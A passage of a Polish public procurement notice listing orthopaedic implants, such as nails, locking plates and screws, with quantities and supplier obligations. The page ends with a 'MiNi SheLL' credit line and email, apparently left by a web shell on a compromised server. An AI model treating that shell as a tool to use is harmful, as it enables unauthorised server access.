1. Wykonawca wypożyczy na czas trwania umowy instrumentarium niezbędne do zaimplantowania. 
2. Wykonawca zapewni serwis instrumentarium przez okres trwania umowy .
3. Wykonawca utworzy depozyt u odbiorcy ( bank implantów) w pełnym zakresie wymiarowym.
4. Wykonawca naprawi uszkodzone elementy instrumentarium oraz wymieni zużyte lub uszkodzone elementy instrumentarium w czasie nieprzekraczającym 2 dni roboczych od zgłoszenia (koszt naprawy, wymiany wliczony w cenę implantów).
5. Wykonawca dostarczy elementy składowe depozytu oraz użyczone instrumentarium w terminie do 2 tygodni od dnia podpisania umowy.
6. Zamawiający wymaga szkolenia personelu w zakresie technik operacyjnych z zastosowaniem zamawianych implantów udokumentowanego certyfikatem i punktami szkoleniowymi.
7.	Koszt wypożyczenia instrumentarium, serwisu, depozytu, napraw i szkoleń wliczony w cenę implantów.
GWOŹDZIE ŚRÓDSZPIKOWE W KOMPLECIE Z WKRĘTAMI ŚRUBAMI
1.	Gwóźdź udowy uniwersalny  10-12mm, L=220-400mm. Wymagania: gwóźdź stalowy, kaniulowany, prawy i lewy. Spełniający warunki gwoździa kompresyjnego, rekonstrukcyjnego i podkolanowego. Śruba zaślepiająca pozwalająca na wydłużenie części bliższej gwoździa	Kpl.	3						
2. 
	Gwóźdź śródszpikowy udowy anatomiczny. Proksymalne ugięcie zapewniające założenie z dostępu bocznego w stosunku do szczytu krętarza większego - tytanowy: Długi - kaniulowany, lewy i prawy. Jeden uniwersalny gwóźdź przeznaczony do leczenia złamań kości udowej (używany przy metodzie kompresyjnej, rekonstrukcyjnej oraz podkrętarzowej - antegrade). Długość L=340÷440mm, średnica d=10÷12mm. Krótki  kaniulowany, długość L=180÷200mm, średnica d=10÷12mm. Gwoździe kodowane kolorami  każda średnica inny kolor. Wkręty z gniazdem Torx 	Kpl.	20						
3. 	Gwóźdź śródszpikowy piszczelowy - tytanowy: Długość L=270-390mm, średnica d=8-11mm, w wersji kaniulowanej. Profilowane przejście części bliższej w stosunku do dalszej w przedziale 9-10°. Zagięcie części dalszej gwoździa - 3°-4° . Instrumentarium zapewniające wykonanie kompresji odłamów bez demontażu celownika. W części dalszej posiadający min. 5 otworów gwintowanych zapewniających co najmniej trzypłaszczyznową stabilizację. Gwoździe kodowane kolorami  każda średnica inny kolor. Wkręty z gniazdem Torx 	Kpl.	25						
4.	Gwóźdź śródszpikowy ramienny z rekonstrukcyjny, kaniulowany. Tytanowy w wersji krótkiej  150mm  8-9mm oraz długiej 180-280mm  7-9mm. W części bliższej co najmniej 4 otwory ustawione w 3 płaszczyznach, w tym otwory gwintowane. Gwoździe kodowane kolorami.	Kpl.	10						
5.	Gwóźdź do kości przedramienia i strzałkowej  4 -5mm, L= 180-300mm. Wymagania: gwóźdź tytanowy lity. 	Kpl.	5						
6.	Gwóźdź udowy krętarzowy, tytanowy  Gamma  10-11mm, L=180-200mm oraz długi L=340-420mm Blokowany w części bliższej dwiema śrubami o  11mm i 6,5mm. W częsci dalszej blokowany wkrętami blokującymi.	Kpl.	35						
7.	Zestaw blokujący do metody odkolanowej L= 50-105 mm	Kpl.	3						
8.	Endoproteza głowy kości promieniowej, cementowa, modularna, składana z dwóch części: głowy i trzpienia. Głowa dostępna w 3 średnicach 20,22,24 mm. Części endoprotezy połączone na zasadzie przegubu, umożliwiając głowie endoprotezy ruchy rotacyjne.	Kpl.	2						
9.	Płytka ustalająca stalowa DHS/DCS. Wymagania: płyta stalowa, zakres długości płyty DSB 68 mm dla płyty 2 otworowej i 228 dla płyty 12 otworowej. Kąt szyjkowy w przedziale 130-140 , ze skokiem co 5 .	Szt.	55						
10.	Śruba zespalająca DHS/DCS	Szt.	55						
11.	Śruba kompresyjna DHS/DCS	Szt.	55						
12.	Szpilka prowadząca DHS/DCS	Szt.	5						
PŁYTKI BLOKOWANE W KOMPLECIE Z WKRĘTAMI TYPU TORX
13.	System płytek blokowanych, tytanowych do bliższej i dalszej nasady kości promieniowej, z gwintem walcowym na pełnym obwodzie. Opcjonalnie wkrety blokowane, kobaltowe	Kpl.	12						
14.	Płytka blokowana do stopy, anatomiczna prosta lub kształtowa. Otwory blokowane posiadajace część gwintowaną walcową. Część trzonowa z podcięciami w celu ograniczenia kontaktu implantu z kością.	Kpl.	5						
15.	Płytka kształtowa, tytanowa, blokowana do korekcji pierwszej kości śródstopia  prosta, , ź. Opcjonalnie wkręty blokowane kobaltowe	Kpl.	6						
16.	Płytka śródkostna blokowana do korekcji pierwszej kości śródstopia. Ytka posiadajaca nakostną część z otworami pod wkręty blokowane oraz część śródkostną wprowadzaną w kanał szpikowy kości. Wersja prawa i lewa. Minimum 2 długości. Płytki w 2 wersjachkształtowych części środkowej: prostej i odgietej.	Kpl. 	6						
17.	Płytka blokowana, tytanowa, rekonstrukcyjna od 4-10 otworów blokowanych, w tym 2 otwory kompresyjne. Otwór blokowany z gwintem walcowym na pełnym obwodzie.	kpl	7						
18.	Płytka kształtowa, blokowana do obojczyka z hakiem lub anatomiczna "S" i trzonowa. Wersja prawa/lewa.	Kpl.	12						
19.	Płytka blokowana, tytanowa, wąska, prosta, kompresyjna, z ograniczonym kontaktem, od 5-12 otworów blokowanych z gwintem walcowym na pełnym obwodzie.	Kpl.	6						
20.	Płytka blokowana, tytanowa, wąska, typu L do bliższej nasady kości piszczelowej, zakładana od strony bocznej, prawa i lewa. W części trzonowej 4-8 otworów blokowanych.	Kpl.	14						
21.	Płytka blokowana prosta 1/3 rurki. Grubość płytki max. 2mm, szerokość max. 13mm. od 4 - 8 otworów blokowanych z gwintem na pełnym obwodzie.	Kpl.	20						
22.	Płytka kształtowa, blokowana do dalszej nasady kości strzałkowej na stronę boczną kości, prawa i lewa. W części trzonowej 3-10 otworów. w części nasadowej minimum 6 otworów blokowanych z gwintem na pełnym obwodzie.	Kpl.	38						
23.	Płytka kształtowa blokowana, tytanowa do dalszej nasady kości piszczelowej, zakładana od strony przednio-bocznej lub przyśrodkowej z możliwością profilowania i docinania. Wersja prawa/lewa. W części nasadowej otwory blokowane o wielokierunkowym ustawieniu w celu pewnej stabilizacji odłamów blokowanych.	Kpl.	16						
24.	Płytka kształtowa, blokowana, tytanowa do bliższej nasady kości ramiennej. W części trzonowej od 3-8 otworów blokowanych z gwintem walcowym na pełnym obwodzie. W części nasadowej minimum 9 otworów blokowanych.	Kpl.	10						
25.	Płytka kształtowa, blokowana do dalszej nasady kości ramiennej, zakładana od strony przyśrodkowej grzbietowo-bocznej, prawa i lewa. W części trzonowej od 3-6 otworów blokowanych.	Kpl.	6						
26.	Płytka wyrostka łokciowego, kształtowa, blokowana do bliższej nasady kości łokciowej, przeznaczona do stabilizacji wyrostka łokciowego, prawa i lewa. W części trzonowej od 2-10 otworów blokowanych. W części nasadowej minimum 8 otworów blokowanych.	Kpl.	6						
27.	Płytka kształtowa blokowana do pięty. Wersja prawa/lewa z minimum 13 otworami blokowanymi	Kpl.	10						
28.	Płytka blokowana, tytanowa, prosta, szeroka, kompresyjna z ograniczonym kontaktem, 6-14 otworów blokowanych z gwintem na pełnym obwodzie.	Kpl.	3						
29.	Płytka anatomiczna, blokowana, tytanowa, kłykciowa do kości piszczelowej lub udowej. W części trzonowej od 4 do 10 otworów blokowanych.	Kpl.	8						
30.	Płytka kształtowa, blokowana, tytanowa do bliższej nasady kości udowej, prawa/lewa. W części nasadowej minimum 3 otwory wielokierunkowe	Kpl.	10						
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33169000-2, 33162000-3,
                    33184100-4,
                    33141770-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>IMPLANTY CHIRURGICZNE I<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Gwóźdź Kirschnera gwintowany  1,5-2,5mm L= 150 -250mm	Szt.	20						
2.	Gwóźdź Ruscha  2,4-4,0mm L= 80-360mm	Szt.	20						
3.	Gwóźdź Kirschnera  0,8-3,0mm L= 150 - 310mm	Szt.	1000						
4.	Grot Steinmana  4,0-4,5mm L= 150-300mm	Szt.	30						
5.	Drut kostny do cerklarzu  0,8- 2,0mm	Szt.	6						
6.	Grotowkręt Schanza samogwintujący  2,5- 5,0 mm L= 60-250mm	Szt.	20						
7.	Klamra waryzujaca 26°/90°międzyosiowa 10,0mm	Szt.	6						
PŁYTKI I WKRĘTY
8.	Płytka rynnowa stalowa 1/2 - 1/3 koła, 3 - 8 otworów	Szt.	10						
9.	Płytka rekonstrukcyjna stalowa, prosta 6-12 otworowa pod wkręty 3,5 i 4,5mm	Szt.	4						
10.	Płytka rekonstrukcyjna stalowa, wygięta R-88 do miednicy 6-12 otworowa pod wkręty 4,5mm	Szt.	2						
11.	Płytka stalowa, dystansowa do otwartej osteotomii korekcyjnej piszczel-udo. Na stronie bocznej posiadająca przynajmniej 7 różnych rozmiarów stożkowego klina w przedziale 5-15mm	Szt.	2						
12.	Wkręt do kości korowej samogwintujący  1,5-2,7mm	Szt.	160						
13	Wkręt do kości korowej tradycyjny lub samogwintujący  3,5-4,5mm	Szt.	600						
14.	Wkręt do kości kostkowy samogwintujący  4,5mm L= 40-70mm	Szt.	50						
15.	Wkręt do kości gąbczastej  6,5mm z gwintem pełnym lub częściowym	Szt.	60						
16.	Wkręt korowy kaniulowany, samogwintujący  2,0 i 2,7mm L= 10-30mm- tytan	Szt.	120						
17.	Wkręt kaniulowany do kości korowej lub gąbczastej, samogwintujący  3,5- 5,0 mm	Szt.	200						
18.	Wkręt kaniulowany do kości gąbczastej, samogwintujący  7,0 mm, gwint 16/32mm	Szt.	50						
19.	Podkładki do w/w wkrętów	Szt.	40						
POZOSTAŁE
20.		Opaska zaciskowa jednokomorowa	Szt.	6						
21.		Opaska zaciskowa dwukomorowa	Szt.	4						
22.		Opaska Esmarch szerokość 6-10 cm, długość 5mb	Szt.	4						
23.		Wiertła o średnicy 1,0- 4,7mm	Szt.	20						
24.		Wiertła kaniulowane do w.w wkrętów	Szt.	20						
25.		Rozwiertak czołowy, giętki d= 6-16mm, typ mocowania DIN I AO	Szt.	10						
26.		Wkrętak kaniulowany do w.w wkrętów	Szt.	15						
27.		Wkrętak sześciokątny do w.w wkrętów	Szt.	15						
28.		Wkrętak szesciokatny z chwytem	Szt.	15						
29.		Gwintownik z rączką HA i HB	Szt.	6						
30.		Gwintownik z rączką HA i HB z chwytem maszynowym	Szt.	6						
31.		Wiertła do rozwiercania łbów uszkodzonych wkrętów- sterylne	Szt.	4						
32.		Klamra do wyciągu  prześwit 145 lub 210mm	Szt.	2						
33.		Kontener do sterylizacji z litym dnem i perforowaną pokrywą 306/272/xxxmm	Szt.	2						
34.		Mata silikonowa 250x235mm	Szt.	1						
35.		Piłka druciana gruba Gigli 500 mm	Szt.	4						
36.		Piłka druciana Gigli 500 mm	Szt.	4						
37.		Uchwyt do piłki drucianej Gigli	Szt.	6						
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33169000-2, 33162000-3,
                    33184100-4,
                    33141770-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>IMPLANTY CHIRURGICZNE II<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymagania konieczne: 
1.	Wykonawca wypożyczy na czas trwania umowy instrumentarium niezbędne do zaimplantowania.
2.	Wykonawca wypożyczy na czas trwania umowy po 2 wkrętaki do każdego rodzaju wkrętów 
3. Wykonawca zapewni serwis instrumentarium przez okres trwania umowy .
4. Wykonawca utworzy depozyt u odbiorcy ( bank implantów) w pełnym zakresie wymiarowym.
5. Wykonawca naprawi uszkodzone elementy instrumentarium oraz wymieni zużyte lub uszkodzone elementy instrumentarium w czasie nieprzekraczającym 2 dni roboczych od zgłoszenia (koszt naprawy, wymiany wliczony w cenę implantów).
6. Wykonawca dostarczy elementy składowe depozytu oraz użyczone instrumentarium w terminie do 2 tygodni od dnia podpisania umowy.
7. Zamawiający wymaga szkolenia personelu w zakresie technik operacyjnych z zastosowaniem zamawianych implantów udokumentowanego certyfikatem i punktami szkoleniowymi.
8. Koszt wypożyczenia instrumentarium, serwisu, depozytu, napraw i szkoleń wliczony w cenę implantów.
9. Techniki operacyjne w formie papierowej w języku polskim.
1.	Płytka tytanowa do dalszej nasady kości promieniowej w kształcie litery T, dłoniowa, skośna, grzbietowa, podgięta, prawa i lewa. Otwory w płytce blokowane i pod wkrety korowe. Ilość otworów w części dalszej od 5-9. płytka z możliwością blokowania śrub wieloosiowych. Możliwość wkręcania śruby poprzez wytworzenie gwintuw otworze płyty. Poliaxalność +/- 15 stopni	Kpl.	25						
2.	Płytki tytanowe anatomiczne o zmniejszonym nacisku do zespoleń złamań nasady dalszej kości ramiennej i części bliższej kości łokciowej. Płytka z wgłębieniami minimalizującymi kontakt z okostną. 
- płytka blokowana od strony przyśrodkowej, standardowa i wydłużona, uniwersalna do obu kończyn
- płytka blokowana od strony bocznej nasady dalszej kości ramiennej, prawa i lewa
System mikropłytek
- płytka blokowana od strony tylno-przyśrodkowej, prawa i lewa
- płytka blokowanaod strony tylno-bocznej nasady dalszej kości ramiennej, prawa i lewa
- płytka blokowana na olecranon, prawa i lewa , ilość otworów od 4-12, otwory niegwintowane do śrub o średnicy 2,7mm i 3,5 mm korowych i blokowanych z nagwintowanymi głowami, które blokują się w płycie przez wytworzenie gwintu w otworze w trakcie wkręcania, bez konieczności stosowania śrubokrętu dynamometrycznego. Możliwość ustawienia kąta wprowadzenia śruby blokowanej w zakresie +/- 15 stopni. W części trzonowej płytki otwory blokująco-kompresyjne	Kpl. 	12						
3.	System mikropłytek
-płytka dłoniowa tytanowa, prosta , 4-16 otworowa,  1,7mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa, kształt L, prawa i lewa6 otworowa,  1,7 mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa kształt T, y, Z, 6-10 otworowa,  1,7 mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa, 5 otworowa, prawa i lewa,  1,7 mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa, kształt H, 2-4x2 otwory oraz 2x2+2 otwory,  1,7 mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa, szeroka, kształt T,  1,7 mm, grubość 0,55 mm.
- płytka dłoniowa tytanowa, prosta, kształt L, T, Z, prawa i lewa,  1,7 mm, grubość 1,0 mm.
- płytka dłoniowa tytanowa, 2-4x2 otwory oraz 2x2+2 otwory,  1,7 mm, grubość 1,0 mm.
- płytka dłoniowa tytanowa, wąska, szeroka, lewa i prawa, kształt L, T Y, Z, 4-16 otworowa,  2,3 mm
- płytka dłoniowa tytanowa, 2-4x2 otwory oraz 2x2+2 otwory,  2,3 mm, grubość 1,0 mm.
- płytka dłoniowa tytanowa, prosta, kompresyjna, kształt L prawa i lewa, Kształt T waska zagięta prawa i lewa,  2,3 mm mm, grubość 1,3 mm
- płytka dłoniowa tytanowa, prosta 4-7 otworowa, kompresyjna, kształt L, waska prawa i lewa, Kształt Y kompresyjna, 2,3 mm, grubość 1,0 mm
- płytka dłoniowa tytanowa prosta 4-13 otworowa, , kształt L,T, Z, prawa i lewa, płytka dłoniowa tytanowa, 2-4x2 otwory oraz 2x2+2 otwory,  2,3 mm, grubość 1,5 mm.	Kpl.	5						
4.	Płytka tytanowa, anatomiczna o zmniejszonym nacisku do zespolen złamań obojczyka:
- płytka górna trzonowa prawa i lewa w 4 wersjach: o zwiększonym i zmniejszonym zagięciu anatomicznym, o zwiększonym i zmniejszonym zagięciu anatomicznym mostujaca, bez otworów w części środkowej płyty
- płytka górno- boczna, lewa i prawa
- płytka przednia trzonowa uniwersalna
- płytka przednio-boczna uniwersalna
- płytka boczna z hakiem o głębokości haka 12,16, 20mm, lewa i prawa, możliwość ustawienia kata śruby blokowanej w każdym otworze +/- 15 stopni. W części trzonowej otwory blokująco-kompresyjne. Śruby blokowane  3,5 i 2,7mm i korowe. L-8-34mm.	Kpl.	25						
5. 	Płytka tytanowa anatomiczna do bliższej nasady kości ramiennej, prawa i lewa. Długość płyty: 86do 202 mm. 7 0tworów gwintowanych w części nasadowej płyty o ustalonym katowo kierunku mocowania płyty, podcięcia przy otworach na druty K umozliwiajace ponowne przymocowanie tkanek miękkich. Otwór owalny do prawidłowego pozycjonowania płyty, otwory pod sruby korowe  3,5mm , w trzonie otwory pod sruby blokowane  4,0 mm i śruby korowe 3,5mm	Kpl.	6						
6.	Płyty tytanowe proste o kształcie zmniejszającym kontakt z kością, blokujaco-kompresyjna, wąska i szeroka. Płyta wyposażona w otwory owalne kompresyjne do śrub korowych i otwory okragłe uniwersalne nie wymagające zaslepek-przejściówek, blokująco-kompresyjne do śrub blokowanych lub korowych. Na końcach płyty otworyumożliwiajace wstępną stabilizację Drutami K. Śruba wyposażona w stożkowy gwint na główce, który tworzy gwint w płycie w momencie wkręcania się śruby. Poliaxalność +/- 15 stopni. Otwory owalnekompresyjne z mozliwością wprowadzenia śruby w pozycji neutralnej i kompresyjnej. Płyty 3-10 otworowe L= 42-126 mm pod śruby o  3,5 i 2,7mm, 	Kpl.	16						
7.	Gwóźdź tytanowy proxymalny kaniulowany ramienny, blokowanyw 4 płaszczyznach. Otwory gwintowane. L= 150-300mm z przeskokiem co 20mm. Prawy i lewy,  8mm. Dynamizacja w części dalszej gwożździa 7,5 cm od jego końca.	Kpl.	10						
8. 	Śruba kaniulowana tytanowa o stałej średnicy 2,0; 3,0; 4,0; 5,0; 6,5; 8,0 mm, częćiowo gwintowana	Szt.	300						
9. 	Podkaładka pod głowę wkrętów z pozycju 8	Szt. 	30						
10. 	Tytanowa dwugwintowa śruba kaniulowana o przekroju 2,0 i 2,5 mm, samotnaca , samogwintująca. Trzon śruby o przekroju 1,6 i 1, 8. kaniulacja o przekroju 1,05 mm. L= 10-30mm w odstępach co 2 mm	Szt. 	100						
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33169000-2, 33162000-3,
                    33184100-4,
                    33141770-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com